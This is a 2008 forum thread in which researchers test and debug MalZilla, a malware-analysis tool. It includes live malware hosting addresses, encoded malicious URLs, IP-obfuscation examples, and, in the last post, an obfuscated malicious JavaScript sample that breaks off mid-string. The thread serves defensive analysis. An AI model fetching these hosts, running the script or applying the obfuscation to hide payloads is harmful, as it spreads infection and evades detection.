Then tried a few other tricks, such as running it in windows 95 compatabilty mode, no change.

Checked the downloaded file, its 0 bytes !!

Ive not had a problem downloading from MDL before but may be worth trying another location. Like MysteryFCM ive had problems in the past using RS and i know others in the UK that have too, i think its something with our ISPs. But never had this kind of problem either here or from any of the other forums we all know and use.

If no one else reports the same problem, then it has to be my end.
Title: Re: MalZilla
Post by: Orac on June 20, 2008, 10:50:48 am
On a more positive note, just had the chance to use HTTPS for the first time, It worked great :)
Title: Re: MalZilla
Post by: bobby on June 20, 2008, 10:52:23 am
Try to grab the files from here:
http://malzilla.sourceforge.net/builds/
Grab just the Malzilla.exe if you already have the DLL files from your previous downloads.
Title: Re: MalZilla
Post by: bobby on June 20, 2008, 10:58:57 am
On a more positive note, just had the chance to use HTTPS for the first time, It worked great :)

Here is how and where I test Malzilla:

Test of GZiped transfer - http://carsten.codimi.de/gzip.yaws/
Test of sent HTTP headers - http://c2.com/cgi/test/
Test of HTTPS - www.gmail.com - follow the first redirection

I still need to find where I can test FTP functionality. As for now, I'm doing it by testing the communication with FTP server of MyCity forum. I would like to find some test server, like the C2 test for HTTP headers.
Title: Re: MalZilla
Post by: Orac on June 20, 2008, 11:47:55 am
That download worked.

Just tested it on some live ftp malware links, and it works perfectly :)

Thanks Bobby thats a great job youve done, next time your in the UK i owe a few beers, afraid i cant help with suitable test sites, the only links ive got are either live malware, or they have been cleaned up.
Title: Re: MalZilla
Post by: tjs on June 20, 2008, 08:53:43 pm
I just downloaded the build from http://malzilla.sourceforge.net/builds/ and found several bugs:

* when using a link with hxxp, the tab name is named hxxp: instead of domain name
   example:
   hxxp://test.com (tab title: hxxp:)
   http://test.com (tab title: test.com)
* check for new updates says that a new update is available
* names in 'about' all have a space before them

Thanks,
TJS
Title: Re: MalZilla
Post by: JohnC on June 20, 2008, 08:58:51 pm
Thanks for adding the little box to choose how much to increase/decrease on Misc Decoders tab, works great :)
Title: Re: MalZilla
Post by: bobby on June 20, 2008, 09:13:03 pm
I just downloaded the build from http://malzilla.sourceforge.net/builds/ and found several bugs:

* when using a link with hxxp, the tab name is named hxxp: instead of domain name
   example:
   hxxp://test.com (tab title: hxxp:)
   http://test.com (tab title: test.com)
* check for new updates says that a new update is available
* names in 'about' all have a space before them

Thanks,
TJS
Hi TJS,
- hxxp thing - fixed (fxp is translated to ftp too). I fixed this once, but it seems that it is gone after I reverted some changes (anyone recall my trying to make a splash screen?)
- spaces in about box fixed
- these are just test builds, neither the update info on the server or the version info in the Malzilla are set up. These are just test builds for us here. I'll set the right values for the formal release on SourceForge

Thanks for testing and reporting :)


Thanks for adding the little box to choose how much to increase/decrease on Misc Decoders tab, works great :)
Hi JohnC,

I have set a limit for that box (-255, 255), is that OK?
I'm not sure if it will work with Unicode in the way it works with ANSI/ASCII.
Title: Re: MalZilla
Post by: bobby on June 20, 2008, 09:31:18 pm
Please download fixed build from http://malzilla.sourceforge.net/builds/
I have fixed the bugs reported by TJS.
Title: Re: MalZilla
Post by: JohnC on June 20, 2008, 09:32:46 pm
Thanks for adding the little box to choose how much to increase/decrease on Misc Decoders tab, works great :)
Hi JohnC,

I have set a limit for that box (-255, 255), is that OK?
I'm not sure if it will work with Unicode in the way it works with ANSI/ASCII.

That should be fine, thank you.
Title: Re: MalZilla
Post by: JohnC on June 20, 2008, 09:38:11 pm
If I try to retrieve this directory with Malzilla using CTRL + GET

ftp://193.253.223.43/tmp/trem/

I see

Quote
06-19-08  10:50PM                  681 1
06-19-08  10:50PM                20673 2
06-19-08  10:50PM                 1244 old
06-19-08  10:50PM                 1929 oldbisok

But if I try and get the file oldbisok, with just GET, I get the response:
"550 /tmp/trem/oldbisok: Le fichier spcifi est introuvable. "

But the file is definitely there and available for download because I grabbed it with an FTP client to make sure.
Title: Re: MalZilla
Post by: bobby on June 20, 2008, 09:45:26 pm
If I try to retrieve this directory with Malzilla using CTRL + GET

ftp://193.253.223.43/tmp/trem/

I see

Quote
06-19-08  10:50PM                  681 1
06-19-08  10:50PM                20673 2
06-19-08  10:50PM                 1244 old
06-19-08  10:50PM                 1929 oldbisok

But if I try and get the file oldbisok, with just GET, I get the response:
"550 /tmp/trem/oldbisok: Le fichier spcifi est introuvable. "

But the file is definitely there and available for download because I grabbed it with an FTP client to make sure.
I know that one, I tried it at testing Malzilla's FTP capabilities. I got the same results.
After that I wanted to be sure, and tried it from Firefox, and I got exactly the same error like in Malzilla.
Which FTP client you have used and succeed in downloading the file?
Title: Re: MalZilla
Post by: JohnC on June 20, 2008, 09:48:54 pm
FlashFXP. It sends RETR oldbisok
Title: Re: MalZilla
Post by: bobby on June 20, 2008, 09:53:56 pm
Hmmm... I just got the file by using Total Commander's integrated FTP client.
So, there is something with settings, as Malzilla and Firefox does not get it, but normal FTP clients does.

There is one basic difference between a ordinary FTP client and Malzilla.
FTP client logs in on the servers, and does not log out until you say so.
Malzilla logs in and out for every click on GET button.

I'll take a look now at connection parameters, to see if it has something to do with PASSIVE settings.
Some servers needs that mode for transferring binary files.
Title: Re: MalZilla
Post by: JohnC on June 20, 2008, 09:58:58 pm
Sometimes a server will need PASV mode enabled/disabled to do stuff, in this case I just checked and it works either way. After logging in It also sends "TYPE I", if that helps you.
Title: Re: MalZilla
Post by: bobby on June 20, 2008, 10:34:00 pm
I saw where is the trick  ;D
The file on the server has a malformed name - it contains space at the end.
Malzilla trim the spaces at the begin and end of the URL by default. This way I prevent mistakes done by bad copy/paste of links from text files or websites.
It seems that FireFox does it too.

What to do now?
To trim spaces or not to trim?
Title: Re: MalZilla
Post by: bobby on June 20, 2008, 11:19:07 pm
OK, get the new EXE from http://malzilla.sourceforge.net/builds/
Hold SHIFT at clicking on GET button, and the whitespaces will not be trimmed out.

To summarize the functions of GET button:

HTTP URLs:
- SHIFT = no trim

FTP URLs:
- SHIFT = no trim
- CTRL = LIST (works only if URL points to a folder)
- SHIFT + CTRL = no trim + LIST

btw. if you get LIST results and try to select (with cursor) behind the oldbiosk file, you will see that you have just one whitespace behind the filename.

FTP unit in Malzilla is now changed a lot (PASV + TYPE I + different parsing of filename and path from URL). Please report if something got broken that downloaded successfully with previous build (worked before changes, now does not work).
Title: Re: MalZilla
Post by: Orac on June 22, 2008, 11:50:33 am
Downloaded the update yesterday, all seems to be working as intended.

Just used the FTP (on the three RFI links i posted earlier today) and it works perfectly.

Havnt got any new HTTPS links to test (yet), will report back on this aspect when i get one  ;)
Title: Re: MalZilla
Post by: Orac on June 22, 2008, 05:54:46 pm
Possible bug

This link http://baptiste-bugnon.ch/help/ix.dat is a copy of Defacing Tool, the link to "//The Rules" want passed to the Links parser, neither was the link "<!-- saved from url=" at the top of the script.

Title: Re: MalZilla
Post by: bobby on June 22, 2008, 07:52:08 pm
No, it is not a bug, it is a feature :)
Malzilla does just what every webspider does - follow the HREF links.
It does not search for every link in the file. Links from textual part of file, links from comments and the links from scripts are not on the list in Link Parser.

I will now explain why is this done this way.
I DO have code that will catch every single URL, even from binary files, but this is far from perfect for HTML files.
Namely, most of the links in HTML files are relative paths (eg. "/images/image.gif")
Those would be missed by my other code that I have.
The current code in Malzilla is searching for every HREF, see if it is relative or absolute path. If it is relative, it search for Base tag (not necessary present in every HTML document). If Base is found, then the absolute paths are calculated relative to this basis. If Base tag is not present, the current URL (from URL box on Download tab) is taken as basis for calculating. See Link Parser tab, "URI base" field. If there stays "URI base (detected)", it means that the HTML contains Base tag. If stays "URI base (not detected)", it means that the URL from Download tab>URL box is used for calculation.

As an example, save any HTML page that does not contain Base tag in HTML header, and where some relative URLs are existing in the document.
Now open a new Download tab and load this document. Take a look at LinkParser - you will not have complete URLs anymore because Malzilla does not know the basis URL.
A solution is to save pages as 'Malzilla projects' (see Settings tab). This way extra info is added to every saved HTML page (does not destroy the page as the info is added in the form of comments). At loading such HTML in Malzilla next time, Malzilla will know the base URL, UserAgent and referrer used.

Now, I can add extra list in LinkParser that will contain all the links detected by a regular expression. That will catch every ABSOLUTE URL (relative URLs can't be found with such function), no matter if the URL is in comment or anywhere else in the document.

More info on Base tag:
http://www.w3schools.com/TAGS/tag_base.asp
Title: Re: MalZilla
Post by: Orac on June 22, 2008, 09:55:31 pm
Thanks for the explanation Bobby, iam surprised i hadnt noticed it before.

I can only assume this must have been the first time weve seen this particular exploit where the rules file hasnt been a HREF link, and as such the skiddie has in fact borked the script, which is meant to load that file as an add on to the scripts defacing abilities.

The particular link in this script has in fact been 404 for a couple of years now, which allways gives me a laugh, you would have thought they would check its availabilty before attempting to use the script for a RFI lol.



Title: Re: MalZilla
Post by: sowhat-x on June 28, 2008, 12:01:44 pm
Small glitch I've noticed in latest beta,not really important though...

1)Get the latest 'officially' released zip from sourceforge (0.9.3pre5) and extract it...
2)Extract latest devel/test build of malzilla.exe (overwriting the older one),
run it,then simply press the "Mini Html View" button...
"Cannot create file "C:\path-to-malzilla-dir\Cache\tempview".The system cannot find blah-blah..."

Maybe it should automatically create the "Cache" folder upon startup or something...

Title: Re: MalZilla
Post by: bobby on June 28, 2008, 01:37:16 pm
Indeed, Cache folder is created when you do the first download.
I'll correct this bug.

Thanks ;)
Title: Re: MalZilla
Post by: tjs on July 15, 2008, 09:46:23 pm
ISC is reporting on some new javascript trickery:
http://isc.sans.org/diary.html?storyid=4724

Thanks,
TJS
Title: Re: MalZilla
Post by: tjs on July 16, 2008, 06:24:27 pm
Bug & Suggestions:

I think there's a bug in the latest beta build involving the Hex (%) decoder. The bug doesn't exist in older variants, and I was able to repro the issue on several machines.

Issue: hex encoded strings are not decoded properly.
Example: <script src=http://%7A%73%68%61%63%6B%2E%63%6E> decodes to:
<script src=http:?zshack.c6E>

This is incorrect. %7A%73%68%61%63%6B%2E%63%6E should resolve as zshack.cn.

---

Next, some suggestions for the decoder section-- i've started seeing some malware sites using various IP encoding schemes to obfuscate their payload addresses. They are simple to reverse, but it would be nice to have one built into malzilla. Here are some examples:

hex IP encoding
Octal IP encoding
DWord IP encoding
Hybrid encoding (have fun!)

Here are some examples:

http://207.46.197.32
---------------------
http://0xCF.0x2E.0xC5.0x20
http://0317.056.0305.040
http://00317.0056.00305.0040
http://3475948832
http://7770916128
http://12065883424
http://16360850720
http://0xCF2EC520

I can help you with the calculations if you aren't familiar with this stuff...

Great resouce: http://www.searchlores.org/obscure.htm (not malware)


Thanks!!
TJS
Title: Re: MalZilla
Post by: bobby on July 16, 2008, 06:48:41 pm
Thanks for reporting the bug. It is indeed a BUG.
If you use Decode hex button - you see the bug.
If you use right-click menu > Run script (internal) > decode hex - it works like it should.
I'll take a look what I did wrong.

I'll also take a look at that IP encoding. Thanks for mentioning this, I have forgot about such IP encoding. I saw that kind of obfuscation only once, a couple of years ago, and I forgot about it.
Title: Re: MalZilla
Post by: tjs on July 16, 2008, 08:11:30 pm
My pleasure, friend. :)
Title: Re: MalZilla
Post by: bobby on August 10, 2008, 07:28:06 pm
After a lot of time...
http://malzilla.sourceforge.net/builds/

Please download updated files from this folder (you do not need to download the DLL files if you already have them, these are not updated).

Changelog:

Bugfixes:
- Misc Decoders rewrite
- Cookies tab (in Download tab) fixed. It does not mix cookies from various tabs anymore
- Hex vies (in Download tab) fixed. Does not show wrong data (from wrong tab) anymore
- improvements in Mini HTML view
- other that I already forgot

Additions:
- new tool on Tools tab - IP converter (see TJS' post)
- decoder Templates

Decoder Templates are code snippets to be added to script before decoding. Some of the variables from snippets will be automatically replaced with values from Malzilla. See Docs folder, there is a list of variables that would be replaced in templates with values from Malzilla (e.g. malzilla.location.href will be replaced with the content of URL filed on Download tab).
This should help a bit at deobfuscating scripts that are using non-trivial DOM objects.
More templates to come.
All the templates need to be in Templates folder if you want them to appear on the list of templates.


So, if everything goes fine, this will be Malzilla 1.0

Things that are not implemented (and probably will not be implemented because of complexity):
- downloading from FTP on Clipboard Monitor tab
- multi-language interface (we have started this once, but it takes a lot of time that I do not have)
Title: Re: MalZilla
Post by: MysteryFCM on August 11, 2008, 12:45:40 pm
Nice one dude :)
Title: Re: MalZilla
Post by: MysteryFCM on August 11, 2008, 02:03:36 pm
Bobby,
Malzilla doesn't seem to detect the iFrame SRC's for the links or iFrames tab for the following;

http://www.sanseng.com/eng/Product.asp

/edit

My bad, forgot to click to send to links parser hehe
Title: Re: MalZilla
Post by: tjs on August 12, 2008, 05:53:41 pm
The 'IP converter' tool is excellent!! I really like the UI. I'll do some deep testing later on and let you know what I find. :)

TJS
Title: Re: MalZilla
Post by: CM_MWR on August 15, 2008, 10:13:45 pm
Quote
Reply #178 on: August 12, 2008, 12:53:41 PM

Quote
I'll do some deep testing later on and let you know what I find.

Spec tjs got into some pretty deep shit,eh?  ;D
Title: Re: MalZilla
Post by: brewt on August 17, 2008, 09:12:59 am
hmm, is there an easy way to decode these unicode html entities?
Code: [Select]
&#104&#116&#116&#112&#58&#47&#47&#111&#112&#97&#110&#97&#46&#99&#110&#47&#121&#97&#46&#104&#116&#109&#108

&#104&#116&#116&#112&#58&#47&#47&#111&#112&#97&#110&#97&#46&#99&#110&#47&#97&#108&#108&#46&#104&#116&#109&#108
Title: Re: MalZilla
Post by: Orac on August 17, 2008, 09:33:48 am
hmm, is there an easy way to decode these unicode html entities?
Code: [Select]
&#104&#116&#116&#112&#58&#47&#47&#111&#112&#97&#110&#97&#46&#99&#110&#47&#121&#97&#46&#104&#116&#109&#108

&#104&#116&#116&#112&#58&#47&#47&#111&#112&#97&#110&#97&#46&#99&#110&#47&#97&#108&#108&#46&#104&#116&#109&#108

Decoded
Code: [Select]
http://opana.cn/ya.htmlhttp://opana.cn/all.html
This was decoded, using the "Enter decimal ASCII here." box available here (http://www.vortex.prodigynet.co.uk/misc/ascii_conv.html)
Title: Re: MalZilla
Post by: bobby on August 17, 2008, 02:06:21 pm
In Malzilla, you can do that on Misc Decoders tab.

btw. hopefully, I will release Malzilla 1.0 today - it will have most robust decoders ever (for unicode, hex, dec...)
Title: Re: MalZilla
Post by: bobby on August 17, 2008, 05:52:18 pm
Malzilla 1.0 released:
http://sourceforge.net/project/showfiles.php?group_id=203466
Title: Re: MalZilla
Post by: MysteryFCM on August 17, 2008, 08:50:29 pm
Nice one dude :)
Title: Re: MalZilla
Post by: Orac on August 18, 2008, 08:33:42 am
Thanks Bobby :)
Title: Re: MalZilla
Post by: tjs on August 19, 2008, 12:27:53 am
Congratulations!! This is great news!
Getting to v1.0 is a huge milestone! It's incredible how widely adopted this tool has become.

Keep up the fantastic work, Bobby!
TJS
Title: Re: MalZilla
Post by: JohnC on September 01, 2008, 10:51:55 pm
The following code gives Access Violations in Malzilla.

Code: [Select]
var uaigei=Array(63,0,0,0,0,0,0,0,0,0,0,0,0,0,0,46,44,21,55,40,22,1,53,39,38,0,0,0,0,0,0,20,42,0,37,3,54,15,4,36,11,12,59,10,32,58,9,19,16,25,26,28,51,48,24,7,49,56,0,0,0,0,0,0,5,8,52,14,17,2,27,18,43,47,13,41,45,30,31,29,50,57,33,35,6,23,62,61,60,34);var lszxla="osc5OV75aesD672vRks6uZHeur@eJeBhXs@eQkaPX4ceuZGPpY@@JpBPeYHaueYuFcaaW1YuR4euQM6GRyBQ@MsuoV6GSceGeHYDJesDhJqvbm2fSYChLYH5SeeuhJqvbm2fJaaPTm2e@V75aOMDWZMGtyGvXl@vBRceO4E5Js@vJR5Bu2VeBb7bosc5O1aaXY2eaOYbpma@hmaaupMSgYGhpYHRIkGPL72BX6B2Ls@vLa@BJ6M@@kfQFaBfg6M@pma@hmaaupMSgYGhpYHRIkGPL72BX2VfIBB2Ls@vLa@BJ6M@@e7bBx@Bb1aBh775QO75@Wc6AmaPb7aP9mcQJl@v6T@6I1Q6I1BB@lGhpl@Q6VGBhea2tBcP6MV5Bb2vg6C@geseXZuPpREhDYHhpaVfI@VeBQChb7Ch6aBPBba2@kfQFaBfg6M@pma@hmaaupMgJ7CRIkGPL72BX2VfIBB2Ls@vLa@BJ6M@@e7bBx@Bb1aBh775QO75@Wc60Y@v9mcQJl@v6TGB@lGhpl@Q6VGBhea2t1aPpY75XaV5BbYb@kqvbm2fgY@5aeYeJr2f4m75b62BIQVfa1BQRmQ6IB@eI@VfpYcfa1VQJmQ6IV@eI@VfLscfa1BPLmQ6IW@eI@Vful7fa1QRsmQ6I4vTI@VfoYcfa1Qg9mQ6I1aPI@Vfu7cfa1Q5JmQ6IB@vI@VfL2cfBbYbFY7eL7aQup@f0R@Bb6M@tyahgCVPSRGabpMSgYGhpYHRIkGPL72BI48hgmMBgY@5aOXucOVfp6cedpVgIbV5JC2eqm6pf1BPN6C5IbV5JC2eql6pf1Be9mcff1aPR2HTpQ8BI4@vI@VfIBVbosc5O4ahResSgYGhpYHR6M@6I4vQIbV5JC2eqY6pf1QeXM55R2GQIbV5JC2eqx6pf1QvBRceIBMGtyahgCVeaeYeT2@ehJqPXsGeJeYfzmuGRGeGpVY6JaaPIbYbFpGhGYGaJxahaaVfFlCeX1uvIbV5JC2eqm6pf1QPrs@v6aVPSRc60Y@vNC7ff1aPR2HTnQ8BIBGhaxEff1aPR2HTeQ8BIcGPgaVuB@VPXsGeJ6VfBbYbpma@hp@e@4E5Js@vJR5Bb2VfH6HhgmMBgY@5aOXGcOVfux@vXGXRIbV5JC2eqseucOVfx7vnIBMGX2c6uCaPXaVf0Y5oI@BPeYGvg2@6Fs@eSYGBhQ7bLs@vLa@BJ6M@pma@hp@e@4E5Js@vJR5Bb2VfHmMBgY@5aOXuWQ8BIQ5RgTQTHmMBgY@5aOXuRQ8BIcvormBBhT@eXW@5Jp@BI